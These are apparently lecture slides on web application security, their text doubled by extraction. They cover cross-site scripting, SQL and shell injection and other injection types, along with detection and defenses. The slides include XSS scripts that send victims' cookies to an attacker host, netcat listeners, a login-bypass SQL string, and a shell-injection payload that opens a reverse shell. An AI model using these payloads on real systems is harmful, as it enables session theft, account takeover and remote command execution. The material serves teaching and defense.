web security. why web security: a real business problem > 60% of total attack attempts observed...
TRANSCRIPT
Web SecurityWeb Security
Why Web Security: Why Web Security: a Real Business a Real Business ProblemProblem
> 60% of total attack attempts > 60% of total attack attempts observed on the Net are against observed on the Net are against Web applicationsWeb applications
> 80% of vulnerabilities discovered > 80% of vulnerabilities discovered are in web appsare in web apps
Independent security auditIndependent security audit Regulatory complianceRegulatory compliance
Auditor findingAuditor finding Freeform edit boxFreeform edit box
– Message to Customer Message to Customer ServiceService
XSS issue raisedXSS issue raised Must provide a Must provide a
response:response:– Prove issue to be a Prove issue to be a
non-problemnon-problemoror
– Describe actions to Describe actions to take take
Web AttacksWeb Attacks Cross Site Scripting (XSS)Cross Site Scripting (XSS) SQL InjectionSQL Injection Shell AttacksShell Attacks
If interested in moreIf interested in more XPATH InjectionXPATH Injection LDAP InjectionLDAP Injection SSI InjectionSSI Injection JSP InjectionJSP Injection
Cross Site ScriptingCross Site Scripting
Attacker goal: their code into Attacker goal: their code into browserbrowser
XSS forces a website visitor to XSS forces a website visitor to execute malicious code in his/her execute malicious code in his/her browserbrowser
Count for roughly 80% of all Count for roughly 80% of all documented security documented security vulnerabilitiesvulnerabilities
XSS RisksXSS Risks
XSS abuses render engines or XSS abuses render engines or plug-insplug-ins
Steal browser cookiesSteal browser cookies Steal session info for replay Steal session info for replay
attackattack Malware or bot installationMalware or bot installation Redirect or phishing attemptRedirect or phishing attempt
XSS Example 1XSS Example 1 Trudy posts the following JavaScript on a Trudy posts the following JavaScript on a
message board:message board: <script language="javascript"> <script language="javascript">
var url = var url = "http://machineaddress:9000/index.html?"http://machineaddress:9000/index.html?cookie=“+ encodeURI(document.cookie); cookie=“+ encodeURI(document.cookie); </script> </script>
Then run a TCP server listening on port Then run a TCP server listening on port 9000 with e.g., nc –l –p 90009000 with e.g., nc –l –p 9000
When Bob views the posted message, his When Bob views the posted message, his browser executes the malicious script, and browser executes the malicious script, and his session cookie is sent to Trudyhis session cookie is sent to Trudy
XSS Demo InstructionsXSS Demo Instructions Set port forward to bypass the firewallSet port forward to bypass the firewall
ssh -L 8000:netsec-demos:2000 ssh -L 8000:netsec-demos:2000 [email protected] [email protected]
Note: 8000 is the local port, it's forwarded to Note: 8000 is the local port, it's forwarded to netsec-demos port 2000 through netsecnetsec-demos port 2000 through netsec
Use http://localhost:8000 to access Use http://localhost:8000 to access http://netsec-http://netsec-demos.cs.northwestern.edu:2000 demos.cs.northwestern.edu:2000
XSS Demo Instructions XSS Demo Instructions (II)(II)
Login as ychen and post the script with a Login as ychen and post the script with a sexy title (e.g., hot game!)sexy title (e.g., hot game!)
<script language="javascript"><script language="javascript">
var url = "http://dod.cs.northwestern.edu:5000/index.html?var url = "http://dod.cs.northwestern.edu:5000/index.html?cookie=";cookie=";
url = url + encodeURI(document.cookie);url = url + encodeURI(document.cookie);
new Image().src=url;new Image().src=url;
</script></script>
Hi Everyone! Thanks for your cookies!Hi Everyone! Thanks for your cookies!
Ssh to any other machine (e.g., Ssh to any other machine (e.g., netsec.cs.northwestern.edu) and runnetsec.cs.northwestern.edu) and run
nc –l 5000 nc –l 5000
Simple XSS CodeSimple XSS Codevar url = var url =
"http://machineaddress:5000/index.html?"http://machineaddress:5000/index.html?cookie=“+ encodeURI(document.cookie);cookie=“+ encodeURI(document.cookie);
document.cookie is the browser's entire document.cookie is the browser's entire cookie for the current website cookie for the current website
encodeURI() is a javascript function to encodeURI() is a javascript function to hex-encode certain characters to be hex-encode certain characters to be included as part of a URLincluded as part of a URL– E.g., changing the space character to %20E.g., changing the space character to %20– Make the URL less suspiciousMake the URL less suspicious
What can Trudy Do with What can Trudy Do with the Cookie?the Cookie?
Another user test458 login as and when Another user test458 login as and when clicking the post, cookie is sent to Trudyclicking the post, cookie is sent to Trudy
Crack Bob’s password (MD5 hash in the Crack Bob’s password (MD5 hash in the cookie) with John the Ripper or any cookie) with John the Ripper or any password crackerpassword cracker
For more info, For more info, http://netsec.cs.northwestern.edu/resources/passhttp://netsec.cs.northwestern.edu/resources/password-cracking/word-cracking/
Use a Firefox plugin like Tamperdata to Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bobreset your cookies to impersonate Bob
XSS Example 2XSS Example 2
Trudy sends a link of the following URL to Bob Trudy sends a link of the following URL to Bob that will take him to a personalized page:that will take him to a personalized page:
http://host/personalizedpage.php?http://host/personalizedpage.php?username=<script>document.location='http:/username=<script>document.location='http://trudyhost/cgi-bin//trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>stealcookie.cgi?'+document.cookie</script>
A page is returned that contains the malicious A page is returned that contains the malicious script, and Bob’s browser executes the script script, and Bob’s browser executes the script causing his session cookie to be sent to Trudycausing his session cookie to be sent to Trudy
Hex is often used in place of ASCII for the Hex is often used in place of ASCII for the JavaScript to make the URL less suspiciousJavaScript to make the URL less suspicious
XSS DetectionXSS Detection
A client usually is not supposed to A client usually is not supposed to send scripts to serverssend scripts to servers
If the server receives <SCRIPT>… or If the server receives <SCRIPT>… or the hex equivalent in an incoming the hex equivalent in an incoming packet and that same script is sent packet and that same script is sent unsanitized in an outgoing packet or in unsanitized in an outgoing packet or in an outgoing SQL statement to the an outgoing SQL statement to the database, then an attack has occurreddatabase, then an attack has occurred– A sanitized script could look like A sanitized script could look like
&ls;SCRIPT>…&ls;SCRIPT>…
SQL InjectionSQL Injection
Malicious SQL statements run on a Malicious SQL statements run on a database and thus attack the serverdatabase and thus attack the server
– XSS can only target other usersXSS can only target other users
SQL Injection ExampleSQL Injection Example Trudy accesses Bob’s website; in which he does not Trudy accesses Bob’s website; in which he does not
validate input on his sign in formvalidate input on his sign in form– Runs a SQL statement like the following:Runs a SQL statement like the following:– select username, user_password from select username, user_password from
minibbtable_users where user_password = minibbtable_users where user_password = md5('johnspassword') and username='johndoe’; md5('johnspassword') and username='johndoe’;
Set username to ' or '1'='1 Set username to ' or '1'='1 select username, user_password from select username, user_password from
minibbtable_users where user_password = minibbtable_users where user_password = md5('anyrandompassword') and username='' or md5('anyrandompassword') and username='' or '1'='1’; '1'='1’;
Effect: picks any row where the username is blank Effect: picks any row where the username is blank and the password matches or any row where true.and the password matches or any row where true.
Add “limit 1” to pick the first rowAdd “limit 1” to pick the first row
SQL Injection SQL Injection DetectionDetection
To detect and prevent this at Bob’s To detect and prevent this at Bob’s locationlocation– Log any traffic from Trudy to Bob Log any traffic from Trudy to Bob
containing form data containing a containing form data containing a quotation markquotation mark
– Match any outgoing SQL statements Match any outgoing SQL statements from Bob’s web server to his database from Bob’s web server to his database server and verify that the quotation server and verify that the quotation marks Trudy supplied were escapedmarks Trudy supplied were escaped
– If they weren’t, take actionIf they weren’t, take action
Shell AttacksShell Attacks
Control an actual machine like Control an actual machine like a web servera web server
Shell AttacksShell Attacks
Inject commands into scripts that Inject commands into scripts that use Linux utilitiesuse Linux utilities– E.g., with “;” as command separator in E.g., with “;” as command separator in
UNIX/LINUXUNIX/LINUX CGI programs like perl can use CGI programs like perl can use
command-line programs (e.g. grep, command-line programs (e.g. grep, ls)ls)
Unsanitized input as arguments Unsanitized input as arguments can lead to command execution.can lead to command execution.
Shell Attacks DemoShell Attacks Demo
Search engine in MiniBB webserver executesSearch engine in MiniBB webserver executessystem("echo $user_usr " . $phrase . " >>/tmp/searchlogs");system("echo $user_usr " . $phrase . " >>/tmp/searchlogs");
Put phrase as: >Put phrase as: >/dev/null; id; echo /dev/null; id; echo randomdata randomdata – Hide user IDHide user ID– Store random data in logs to evade detectionStore random data in logs to evade detection
We can even get a remote shell !We can even get a remote shell !– >/dev/null; nc netsec 9000 -e /bin/sh>/dev/null; nc netsec 9000 -e /bin/sh
Defense ApproachesDefense Approaches
Web firewall/IDSWeb firewall/IDS– ModSecurity for ApacheModSecurity for Apache– Commercial: SecureSphere from Commercial: SecureSphere from
ImperviaImpervia Static code analysisStatic code analysis
– Open source: NiktoOpen source: Nikto– Commercial: Commercial:
Acutenix Web Vulnerability ScannerAcutenix Web Vulnerability Scanner N-stalkerN-stalker
Education on good codingEducation on good coding– HTML encoding on input (server-side)HTML encoding on input (server-side)– Input validation/filteringInput validation/filtering
Backup SlidesBackup Slides
XPATH Injection XPATH Injection ExampleExample Similar to SQL injectionSimilar to SQL injection Bob has a form that does not sanitize Bob has a form that does not sanitize
user-provided input before using it as part user-provided input before using it as part of an XPATH query::of an XPATH query::– string(//user[name/text()=’USER_NAME' and string(//user[name/text()=’USER_NAME' and
password/text()=’USER_PASS']/account/text())password/text()=’USER_PASS']/account/text()) Trudy again can provide the following Trudy again can provide the following
password to change the statement’s password to change the statement’s logic: logic: – X’ OR ‘x’=‘xX’ OR ‘x’=‘x– The statement thus selects the first accountThe statement thus selects the first account
LDAP Injection LDAP Injection ExampleExample Server using LDAP for authenticationServer using LDAP for authentication
– User name initialized, but then uses User name initialized, but then uses unchecked user input to create a queryunchecked user input to create a query
filter = "(uid=" + CStr(userName) + ")" ' filter = "(uid=" + CStr(userName) + ")" ' searching for the user entrysearching for the user entry
Attacker can exploit using special Attacker can exploit using special characterscharacters
http://example/ldapsearch.asp?user=*http://example/ldapsearch.asp?user=*
LDAP Injection LDAP Injection DetectionDetection Detection is based off of usage of Detection is based off of usage of
special LDAP charactersspecial LDAP characters– System monitors input for special System monitors input for special
characterscharacters– Either scrubs incoming input or Either scrubs incoming input or
watches for unescaped output watches for unescaped output passed to database serverpassed to database server
Detection approach is blackboxDetection approach is blackbox
SSI Injection ExampleSSI Injection Example
Bob has his server configured to use Bob has his server configured to use Server-Side IncludesServer-Side Includes
Trudy passes input with an SSI embeddedTrudy passes input with an SSI embedded
<!--#INCLUDE VIRTUAL="/web.config"--><!--#INCLUDE VIRTUAL="/web.config"--> SSI inserts malicious code into normal SSI inserts malicious code into normal
webpages upon next requestwebpages upon next request Future legitimate users get content Future legitimate users get content
containing the tainted code included by containing the tainted code included by the SSIthe SSI
JSP Injection ExampleJSP Injection Example
Similar to SSI injectionSimilar to SSI injection Bob has a portal server configured Bob has a portal server configured
to use dynamic code for templatesto use dynamic code for templates Trudy passes input with an Trudy passes input with an
embedded <jsp:include embedded <jsp:include “http://bad.com/1.jsp” >“http://bad.com/1.jsp” >
malicious code inserted into malicious code inserted into webpagewebpage
JSP Injection JSP Injection PreventionPrevention Prefer static include <%include …>Prefer static include <%include …> Don’t allow file inclusion outside of Don’t allow file inclusion outside of
server via Java2 Security policiesserver via Java2 Security policies Firewall rules to prevent outbound Firewall rules to prevent outbound
requests from serverrequests from server Input validation codingInput validation coding Choose portal software not Choose portal software not
requiring dynamic includes or code requiring dynamic includes or code executionexecution
Q&AQ&A
Suggestions?Suggestions?